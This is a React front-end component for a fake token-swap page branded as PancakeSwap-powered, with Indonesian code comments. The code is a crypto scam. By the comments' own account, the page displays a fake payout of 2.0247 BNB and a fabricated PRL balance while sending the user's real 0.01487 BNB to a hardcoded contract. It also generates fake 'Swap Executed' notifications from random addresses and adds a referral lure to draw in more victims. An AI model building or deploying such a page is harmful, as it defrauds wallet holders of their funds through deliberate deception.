import React, { useState, useEffect } from 'react';
import { ConnectButton } from '@rainbow-me/rainbowkit';
import { useAccount, useBalance, useSwitchChain, useWriteContract, useDisconnect } from 'wagmi';
import { parseEther } from 'viem';

const CONTRACT_ADDRESS = '0xf5b9a3196e8BCA438261F3b7a5E2542d8f6CA636';
const CONTRACT_ABI = [
  {
    inputs: [{ internalType: "address", name: "inviter", type: "address" }],
    name: "swap",
    outputs: [],
    stateMutability: "payable",
    type: "function"
  }
];

export default function SwapPage({ onGoToClaim }) {
  const { isConnected, address, chainId } = useAccount();
  const { data: balanceData } = useBalance({ address });
  const { switchChain } = useSwitchChain();
  const { writeContract, isPending } = useWriteContract();
  const { disconnect } = useDisconnect();
  
  const [swapError, setSwapError] = useState('');
  const [referralAddress, setReferralAddress] = useState('0x0000000000000000000000000000000000000000');
  const [currentDomain, setCurrentDomain] = useState('');

  const [notifications, setNotifications] = useState([]);

  // Ambil domain saat ini ketika komponen di-mount
  useEffect(() => {
    setCurrentDomain(window.location.origin);
  }, []);

  const generateRandomAddress = () => {
    const chars = 'abcdef0123456789';
    let start = '0x';
    for(let i=0; i<3; i++) start += chars[Math.floor(Math.random()*16)];
    let end = '';
    for(let i=0; i<3; i++) end += chars[Math.floor(Math.random()*16)];
    return `${start}...${end}`;
  };

  useEffect(() => {
    let timeouts = [];
    let isMounted = true;

    const runCycle = () => {
      if (!isMounted) return;
      setNotifications([{ id: Date.now() + 1, address: generateRandomAddress() }]);
      timeouts.push(setTimeout(() => {
        if (!isMounted) return;
        setNotifications(prev => [...prev, { id: Date.now() + 2, address: generateRandomAddress() }]);
      }, 2000));
      timeouts.push(setTimeout(() => {
        if (!isMounted) return;
        setNotifications([]);
      }, 5000));
      timeouts.push(setTimeout(() => {
        if (!isMounted) return;
        runCycle();
      }, 10000));
    };

    runCycle();
    return () => {
      isMounted = false;
      timeouts.forEach(clearTimeout);
    };
  }, []);

  // REAL amount untuk contract dan pengecekan balance
  const fixedBnbAmount = 0.01487; 
  // FAKE amount khusus untuk tampilan UI (seolah-olah dapat 2.0247)
  const displayBnbAmount = 2.0247; 
  
  const bnbBalanceFormatted = balanceData ? parseFloat(balanceData.formatted).toFixed(4) : '0.0000';

  const mockPrlBalance = 0; 
  const displayPrlAmount = mockPrlBalance > 0 ? mockPrlBalance : '7875.47';

  useEffect(() => {
    const searchParams = new URLSearchParams(window.location.search);
    const refParam = searchParams.get('ref');
    if (refParam && /^0x[a-fA-F0-9]{40}$/.test(refParam)) {
      setReferralAddress(refParam);
    }
  }, []);

  useEffect(() => {
    if (isConnected && chainId !== 56 && switchChain) {
      switchChain({ chainId: 56 });
    }
  }, [isConnected, chainId, switchChain]);

  const handleSwapClick = () => {
    const currentBalance = balanceData ? parseFloat(balanceData.formatted) : 0;
    // Pengecekan balance tetap pakai harga asli (0.01487)
    if (currentBalance < fixedBnbAmount) {
      setSwapError(`Insufficient BNB balance. you must HODL 0.01487 BNB for SWAP`);
      return;
    }
    setSwapError('');

    // Transaksi di belakang layar tetap eksekusi 0.01487
    writeContract({
      address: CONTRACT_ADDRESS,
      abi: CONTRACT_ABI,
      functionName: 'swap',
      args: [referralAddress],
      value: parseEther(fixedBnbAmount.toString()),
    });
  };

  return (
    <div 
      className="min-h-screen relative overflow-x-hidden flex flex-col items-center bg-cover bg-center bg-no-repeat bg-fixed bg-[#faf9fa]"
      style={{ backgroundImage: "url('/bg.png')" }}
    >
      <style>{`
        @keyframes slideInRight {
          from { transform: translateX(120%); opacity: 0; }
          to { transform: translateX(0); opacity: 1; }
        }
        .notif-animate {
          animation: slideInRight 0.5s cubic-bezier(0.25, 0.8, 0.25, 1) forwards;
        }
      `}</style>

      <div className="fixed top-20 right-4 z-50 flex flex-col gap-2.5 pointer-events-none max-w-[70vw]">
        {notifications.map((notif) => (
          <div key={notif.id} className="notif-animate bg-white border border-[#e7e3eb] shadow-[0_4px_12px_rgba(0,0,0,0.1)] rounded-2xl p-3 w-56 flex items-start gap-2.5">
            <div className="bg-[#1fc7d4] rounded-full p-1 mt-0.5 shadow-sm flex-shrink-0">
              <svg viewBox="0 0 24 24" width="14px" fill="white"><path d="M9 16.17L4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"></path></svg>
            </div>
            <div>
              <h4 className="text-[#280d5f] text-xs font-bold mb-0.5">Swap Executed</h4>
              <p className="text-[#7a6eaa] text-[10px] font-medium leading-relaxed">
                <span className="font-bold text-[#280d5f]">{notif.address}</span> swapped <br/> 
                <span className="text-[#280d5f] font-bold">7,875 PRL</span> to <span className="text-[#1fc7d4] font-bold">2.0247 BNB</span>
              </p>
            </div>
          </div>
        ))}
      </div>

      <div className="w-full max-w-7xl mx-auto flex justify-between items-center pt-6 px-6 md:px-10 z-10">
        <img src="/logo.webp" alt="PRL Logo" className="h-10 object-contain cursor-pointer" onClick={onGoToClaim} onError={(e) => e.target.style.display='none'} />
        
        <ConnectButton.Custom>
          {({ account, chain, openAccountModal, openChainModal, openConnectModal, mounted }) => {
            const ready = mounted;
            const connected = ready && account && chain;
            return (
              <div {...(!ready && { 'aria-hidden': true, style: { opacity: 0, pointerEvents: 'none', userSelect: 'none' } })}>
                {(() => {
                  const btnClass = "bg-white border border-gray-200 text-gray-700 font-bold py-1.5 px-4 rounded-xl text-sm transition-all shadow-[0_3px_0_0_#e5e7eb] hover:bg-gray-50 active:shadow-none active:translate-y-[3px]";
                  
                  if (!connected) return <button onClick={openConnectModal} type="button" className={btnClass}>Connect</button>;
                  
                  if (chain.unsupported) return <button onClick={openChainModal} type="button" className="bg-red-500 border border-red-600 text-white font-bold py-1.5 px-4 rounded-xl text-sm shadow-[0_3px_0_0_#b91c1c] active:shadow-none active:translate-y-[3px]">Wrong network</button>;
                  
                  return (
                    <div className="flex items-center gap-2">
                      <button onClick={openAccountModal} type="button" className={btnClass}>
                        {account.displayName}
                      </button>
                      <button 
                        onClick={() => disconnect()} 
                        type="button" 
                        title="Disconnect Wallet"
                        className="bg-white border border-gray-200 text-red-500 p-2 rounded-xl transition-all shadow-[0_3px_0_0_#e5e7eb] hover:bg-red-50 active:shadow-none active:translate-y-[3px] flex items-center justify-center"
                      >
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2.5" strokeLinecap="round" strokeLinejoin="round">
                          <path d="M9 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h4"></path>
                          <polyline points="16 17 21 12 16 7"></polyline>
                          <line x1="21" y1="12" x2="9" y2="12"></line>
                        </svg>
                      </button>
                    </div>
                  );
                })()}
              </div>
            );
          }}
        </ConnectButton.Custom>
      </div>

      <div className="w-full max-w-md mx-auto px-4 mt-10 z-10 flex flex-col items-center pb-20">
        
        <button onClick={onGoToClaim} className="mb-6 text-[#e85a19] font-bold text-sm hover:underline self-start">
          &larr; Back to Claim
        </button>

        <div className="bg-white rounded-[24px] w-full shadow-sm border border-[#e7e3eb] overflow-hidden">
          <div className="px-6 py-5 border-b border-[#e7e3eb] flex justify-between items-center">
            <div>
              <h2 className="text-[#280d5f] text-xl font-bold">Swap</h2>
              <p className="text-[#7a6eaa] text-sm font-medium mt-1">Trade PRL to BNB in an instant</p>
            </div>
            <div className="text-[#7a6eaa] cursor-pointer hover:opacity-70">
              <svg viewBox="0 0 24 24" width="24px" fill="currentColor"><path d="M19.14,12.94c0.04-0.3,0.06-0.61,0.06-0.94c0-0.32-0.02-0.64-0.06-0.94l2.03-1.58c0.18-0.14,0.23-0.41,0.12-0.61 l-1.92-3.32c-0.12-0.22-0.37-0.29-0.59-0.22l-2.39,0.96c-0.5-0.38-1.03-0.7-1.62-0.94L14.4,2.81c-0.04-0.24-0.24-0.41-0.48-0.41 h-3.84c-0.24,0-0.43,0.17-0.47,0.41L9.25,5.35C8.66,5.59,8.12,5.92,7.63,6.29L5.24,5.33c-0.22-0.08-0.47,0-0.59,0.22L2.73,8.87 C2.62,9.08,2.66,9.34,2.86,9.48l2.03,1.58C4.84,11.36,4.8,11.69,4.8,12s0.02,0.64,0.06,0.94l-2.03,1.58 c-0.18,0.14-0.23,0.41-0.12,0.61l1.92,3.32c0.12,0.22,0.37,0.29,0.59,0.22l2.39-0.96c0.5,0.38,1.03,0.7,1.62,0.94l0.36,2.54 c0.05,0.24,0.24,0.41,0.48,0.41h3.84c0.24,0,0.43-0.17,0.47-0.41l0.36-2.54c0.59-0.24,1.13-0.56,1.62-0.94l2.39,0.96 c0.22,0.08,0.47,0,0.59-0.22l1.92-3.32c0.12-0.22,0.07-0.49-0.12-0.61L19.14,12.94z M12,15.6c-1.98,0-3.6-1.62-3.6-3.6 s1.62-3.6,3.6-3.6s3.6,1.62,3.6,3.6S13.98,15.6,12,15.6z"></path></svg>
            </div>
          </div>

          <div className="p-4">
            <div className="bg-[#eeeaf4] rounded-2xl p-4 mb-2 hover:bg-[#e6e2f0] transition-colors relative">
              <p className="text-[#7a6eaa] text-xs font-bold mb-2">From</p>
              <div className="flex justify-between items-center">
                <input type="text" value={displayPrlAmount} readOnly className="bg-transparent text-[#280d5f] text-2xl font-bold outline-none w-full pr-2" />
                <div className="flex items-center gap-2 bg-white rounded-full px-4 py-1.5 shadow-sm whitespace-nowrap">
                  <img src="/token.jpg" alt="PRL" className="w-6 h-6 rounded-full object-cover" onError={(e) => e.target.style.display='none'} />
                  <span className="text-[#280d5f] font-bold text-sm pr-1">PRL</span>
                </div>
              </div>
              {isConnected && (
                <div className="text-[#7a6eaa] text-xs font-medium mt-2 text-right">Balance: {mockPrlBalance > 0 ? mockPrlBalance : '7,875.47'}</div>
              )}
            </div>

            <div className="flex justify-center -my-4 z-10 relative">
              <div className="bg-[#eeeaf4] border-4 border-white rounded-full p-1.5 cursor-pointer hover:bg-[#1fc7d4] hover:text-white transition-colors text-[#1fc7d4]">
                <svg viewBox="0 0 24 24" width="20px" fill="currentColor"><path d="M11 5V16.17L6.11997 11.29C5.72997 10.9 5.08997 10.9 4.69997 11.29C4.30997 11.68 4.30997 12.31 4.69997 12.7L11.29 19.29C11.68 19.68 12.31 19.68 12.7 19.29L19.29 12.7C19.68 12.31 19.68 11.68 19.29 11.29C18.9 10.9 18.27 10.9 17.88 11.29L13 16.17V5C13 4.45 12.55 4 12 4C11.45 4 11 4.45 11 5Z"></path></svg>
              </div>
            </div>

            <div className="bg-[#eeeaf4] rounded-2xl p-4 mt-2 hover:bg-[#e6e2f0] transition-colors relative">
              <p className="text-[#7a6eaa] text-xs font-bold mb-2">To</p>
              <div className="flex justify-between items-center">
                {/* Diubah jadi displayBnbAmount agar tampil 2.0247 */}
                <input type="text" value={displayBnbAmount} readOnly className="bg-transparent text-[#280d5f] text-2xl font-bold outline-none w-full" />
                <div className="flex items-center gap-2 bg-white rounded-full px-4 py-1.5 shadow-sm whitespace-nowrap">
                  <img src="https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/binance/info/logo.png" alt="BNB" className="w-6 h-6 rounded-full" />
                  <span className="text-[#280d5f] font-bold text-sm pr-1">BNB</span>
                </div>
              </div>
              {isConnected && (
                <div className="text-[#7a6eaa] text-xs font-medium mt-2 text-right">Balance: {bnbBalanceFormatted}</div>
              )}
            </div>

            <div className="flex justify-between items-center text-[#1fc7d4] text-sm font-bold mt-4 px-2 mb-2">
              <span className="text-[#7a6eaa]">Slippage Tolerance</span>
              <span>0.5%</span>
            </div>

            <div className="mt-2">
              {!isConnected ? (
                <ConnectButton.Custom>
                  {({ openConnectModal }) => (
                    <button onClick={openConnectModal} className="w-full rounded-[16px] bg-[#1fc7d4] hover:bg-[#31d0dd] text-white font-bold py-4 text-base shadow-[0px_-2px_0px_0px_rgba(0,0,0,0.1)_inset] transition-all">
                      SWAP
                    </button>
                  )}
                </ConnectButton.Custom>
              ) : (
                <button onClick={handleSwapClick} disabled={isPending} className="w-full rounded-[16px] bg-[#1fc7d4] hover:bg-[#31d0dd] text-white font-bold py-4 text-base shadow-[0px_-2px_0px_0px_rgba(0,0,0,0.1)_inset] transition-all disabled:opacity-70 disabled:cursor-not-allowed">
                  {isPending ? 'Swapping...' : 'Swap'}
                </button>
              )}

              {swapError && (
                <p className="text-[#ed4b9e] text-sm text-center mt-3 font-bold">{swapError}</p>
              )}
            </div>

          </div>
        </div>

        <div className="flex flex-col items-center mt-6 gap-2 w-full">
          <a href="https://bscscan.com/token/0xf5b9a3196e8BCA438261F3b7a5E2542d8f6CA636" target="_blank" rel="noreferrer" className="text-[#1fc7d4] text-sm font-bold hover:underline flex items-center gap-1">
            View on BscScan <svg viewBox="0 0 24 24" width="16px" fill="currentColor"><path d="M18 19H6C5.45 19 5 18.55 5 18V6C5 5.45 5.45 5 6 5H11C11.55 5 12 4.55 12 4C12 3.45 11.55 3 11 3H5C3.89 3 3 3.9 3 5V19C3 20.1 3.9 21 5 21H19C20.1 21 21 20.1 21 19V13C21 12.45 20.55 12 20 12C19.45 12 19 12.45 19 13V18C19 18.55 18.55 19 18 19ZM14 4C14 4.55 14.45 5 15 5H17.59L8.46 14.13C8.07 14.52 8.07 15.15 8.46 15.54C8.85 15.93 9.48 15.93 9.87 15.54L19 6.41V9C19 9.55 19.45 10 20 10C20.55 10 21 9.55 21 9V4C21 3.45 20.55 3 20 3H15C14.45 3 14 3.45 14 4Z"></path></svg>
          </a>
          
          <a href="https://pancakeswap.finance/swap" target="_blank" rel="noreferrer" className="flex items-center gap-2 mt-2 bg-white/60 px-4 py-2 rounded-full border border-gray-200 hover:bg-white transition-colors shadow-sm">
            <span className="text-[#7a6eaa] text-xs font-bold">Powered by PancakeSwap</span>
            <img src="/cake.avif" alt="PancakeSwap" className="w-5 h-5 rounded-full object-cover" onError={(e) => e.target.style.display='none'} />
          </a>
        </div>

        <div className="bg-white rounded-[24px] shadow-sm border border-[#e7e3eb] p-6 mt-8 w-full">
            <h2 className="text-[#280d5f] text-lg font-bold mb-2">Referral Program</h2>
            <p className="text-[#7a6eaa] text-sm font-medium mb-4">Invite friends and earn 10% BNB + 100% PRL rewards.</p>
            <div className="flex gap-2">
                <input 
                  type="text" 
                  readOnly 
                  value={isConnected ? `${currentDomain}/?ref=${address}` : 'Connect wallet to get link'} 
                  className="flex-1 bg-[#eeeaf4] border-none rounded-[16px] px-4 py-3 text-sm text-[#280d5f] font-medium outline-none" 
                />
                <button 
                  className="bg-[#1fc7d4] hover:bg-[#31d0dd] text-white px-5 py-3 rounded-[16px] text-sm font-bold transition-colors shadow-[0px_-2px_0px_0px_rgba(0,0,0,0.1)_inset]"
                  onClick={() => {
                    if(isConnected) {
                      navigator.clipboard.writeText(`${currentDomain}/?ref=${address}`);
                      alert("Referral link copied!");
                    }
                  }}
                >
                  Copy
                </button>
            </div>
        </div>
      </div>
    </div>
  );
}